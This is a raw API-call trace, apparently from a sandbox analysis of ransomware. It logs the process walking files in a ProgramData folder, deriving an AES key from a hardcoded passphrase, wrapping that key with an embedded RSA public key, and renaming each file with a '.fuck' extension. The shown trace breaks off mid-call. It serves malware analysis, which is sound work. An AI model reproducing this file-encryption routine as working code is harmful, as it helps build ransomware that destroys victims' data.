GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.649] GetLastError () returned 0x5 [0236.649] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml")) returned 0x20 [0236.649] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", dwFileAttributes=0x80) returned 0 [0236.650] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.650] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.650] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.650] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.654] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.654] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.654] CryptHashData (hHash=0x2817298, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.654] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817118) returned 1 [0236.654] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.654] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.654] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815a18) returned 1 [0236.655] CryptImportPublicKeyInfo (in: hCryptProv=0x2815a18, dwCertEncodingType=0x1, pInfo=0x2809cf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809d20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809d28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2816e98) returned 1 [0236.655] CryptEncrypt (in: hKey=0x2816e98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.655] CryptEncrypt (in: hKey=0x2816e98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815bb0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815bb0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.655] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815bb0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.656] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.656] CryptEncrypt (in: hKey=0x2817118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.656] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.656] CloseHandle (hObject=0xffffffff) returned 1 [0236.656] CloseHandle (hObject=0xffffffff) returned 1 [0236.656] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), bFailIfExists=0) returned 0 [0236.656] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", dwFileAttributes=0x0) returned 0 [0236.657] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.gsg")) returned 0 [0236.657] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml.fuck")) returned 0 [0236.657] CryptDestroyHash (hHash=0x2817298) returned 1 [0236.657] CryptDestroyKey (hKey=0x2817118) returned 1 [0236.657] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.657] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.657] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.657] GetLastError () returned 0x5 [0236.657] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico")) returned 0x20 [0236.658] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", dwFileAttributes=0x80) returned 0 [0236.658] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.659] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.659] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.659] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.664] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.664] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.664] CryptHashData (hHash=0x2817018, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.664] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817018, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817098) returned 1 [0236.664] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.664] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.664] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815440) returned 1 [0236.665] CryptImportPublicKeyInfo (in: hCryptProv=0x2815440, dwCertEncodingType=0x1, pInfo=0x2808d80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2808db0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2808db8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28170d8) returned 1 [0236.666] CryptEncrypt (in: hKey=0x28170d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.666] CryptEncrypt (in: hKey=0x28170d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815cc0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815cc0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.666] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815cc0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.666] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.666] CryptEncrypt (in: hKey=0x2817098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.666] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.666] CloseHandle (hObject=0xffffffff) returned 1 [0236.666] CloseHandle (hObject=0xffffffff) returned 1 [0236.666] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), bFailIfExists=0) returned 0 [0236.667] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico", dwFileAttributes=0x0) returned 0 [0236.667] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.gsg")) returned 0 [0236.668] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.fuck")) returned 0 [0236.668] CryptDestroyHash (hHash=0x2817018) returned 1 [0236.668] CryptDestroyKey (hKey=0x2817098) returned 1 [0236.668] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.668] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.668] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.668] GetLastError () returned 0x5 [0236.668] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico")) returned 0x20 [0236.668] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", dwFileAttributes=0x80) returned 0 [0236.669] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.669] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.669] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.669] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.675] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.675] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.675] CryptHashData (hHash=0x2817018, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.675] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817018, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28173d8) returned 1 [0236.675] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.675] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.675] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815d48) returned 1 [0236.676] CryptImportPublicKeyInfo (in: hCryptProv=0x2815d48, dwCertEncodingType=0x1, pInfo=0x2809810*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809840*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809848*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817058) returned 1 [0236.676] CryptEncrypt (in: hKey=0x2817058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.676] CryptEncrypt (in: hKey=0x2817058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2814cd0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2814cd0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.676] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2814cd0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.677] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.677] CryptEncrypt (in: hKey=0x28173d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.677] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.677] CloseHandle (hObject=0xffffffff) returned 1 [0236.677] CloseHandle (hObject=0xffffffff) returned 1 [0236.677] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), bFailIfExists=0) returned 0 [0236.677] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico", dwFileAttributes=0x0) returned 0 [0236.677] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.gsg")) returned 0 [0236.678] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.fuck")) returned 0 [0236.678] CryptDestroyHash (hHash=0x2817018) returned 1 [0236.678] CryptDestroyKey (hKey=0x28173d8) returned 1 [0236.678] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.678] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.678] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.678] GetLastError () returned 0x5 [0236.678] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico")) returned 0x20 [0236.679] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", dwFileAttributes=0x80) returned 0 [0236.679] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.679] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.680] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.680] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.685] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.685] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.685] CryptHashData (hHash=0x2817118, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.685] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817118, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817098) returned 1 [0236.685] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.685] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.685] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28155d8) returned 1 [0236.687] CryptImportPublicKeyInfo (in: hCryptProv=0x28155d8, dwCertEncodingType=0x1, pInfo=0x2809a80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809ab0*, PublicKey.cbData=0x8c, 